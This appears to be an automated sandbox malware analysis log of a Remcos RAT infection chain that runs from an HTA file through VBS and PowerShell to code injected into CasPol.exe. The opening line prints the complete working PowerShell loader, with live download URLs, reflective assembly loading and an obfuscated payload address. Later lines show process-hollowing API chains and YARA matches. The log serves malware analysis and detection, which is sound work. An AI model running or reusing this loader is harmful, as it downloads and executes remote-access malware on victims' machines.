                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041742B GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_0041742B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041AECC OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041AECC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041AEF8 OpenProcess,NtResumeProcess,CloseHandle,12_2_0041AEF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00415A51 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_00415A51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D04B12_2_0043D04B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042707E12_2_0042707E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041301D12_2_0041301D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044103012_2_00441030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045311012_2_00453110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004271B812_2_004271B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D27C12_2_0041D27C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004522E212_2_004522E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D2A812_2_0043D2A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043736012_2_00437360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004363BA12_2_004363BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042645F12_2_0042645F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043158212_2_00431582
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043672C12_2_0043672C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E7EA12_2_0041E7EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C94912_2_0044C949
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004269D612_2_004269D6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004369D612_2_004369D6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CBED12_2_0043CBED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432C5412_2_00432C54
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436C9D12_2_00436C9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE1C12_2_0043CE1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436F5812_2_00436F58
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434F3212_2_00434F32
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001719412_2_10017194
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B5C112_2_1000B5C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B04013_2_0044B040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043610D13_2_0043610D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044731013_2_00447310
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044A49013_2_0044A490
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040755A13_2_0040755A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043C56013_2_0043C560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B61013_2_0044B610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044D6C013_2_0044D6C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004476F013_2_004476F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B87013_2_0044B870
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044081D13_2_0044081D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041495713_2_00414957
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004079EE13_2_004079EE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00407AEB13_2_00407AEB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044AA8013_2_0044AA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00412AA913_2_00412AA9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B7413_2_00404B74
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B0313_2_00404B03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044BBD813_2_0044BBD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404BE513_2_00404BE5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404C7613_2_00404C76
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00415CFE13_2_00415CFE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00416D7213_2_00416D72
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D3013_2_00446D30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D8B13_2_00446D8B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406E8F13_2_00406E8F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040503814_2_00405038
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041208C14_2_0041208C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004050A914_2_004050A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040511A14_2_0040511A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043C13A14_2_0043C13A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004051AB14_2_004051AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044930014_2_00449300
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040D32214_2_0040D322
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A4F014_2_0044A4F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041363114_2_00413631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044669014_2_00446690
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A73014_2_0044A730
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004398D814_2_004398D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004498E014_2_004498E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044A88614_2_0044A886
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0043DA0914_2_0043DA09
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00438D5E14_2_00438D5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00449ED014_2_00449ED0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0041FE8314_2_0041FE83
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00430F5414_2_00430F54
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004050C215_2_004050C2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004014AB15_2_004014AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040513315_2_00405133
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004051A415_2_004051A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040124615_2_00401246
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040CA4615_2_0040CA46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040523515_2_00405235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004032C815_2_004032C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040168915_2_00401689
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00402F6015_2_00402F60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433AB0 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004341C0 appears 55 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2007
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2007Jump to behavior
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/20@3/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416C9D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416C9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E2F1 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E2F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A84A FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A84A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419DBA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seethebestthingsforgetmebackwithgoodnewsthings[1].tiffJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ET2B3I
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ued24ssx.dax.ps1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: CasPol.exe, CasPol.exe, 0000000E.00000002.1941224153.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: CasPol.exe, 0000000D.00000002.1949767466.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: CasPol.exe, CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: verynicegirlwalkingarounftheworldmuuuah.htaVirustotal: Detection: 13%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\verynicegirlwalkingarounftheworldmuuuah.hta"
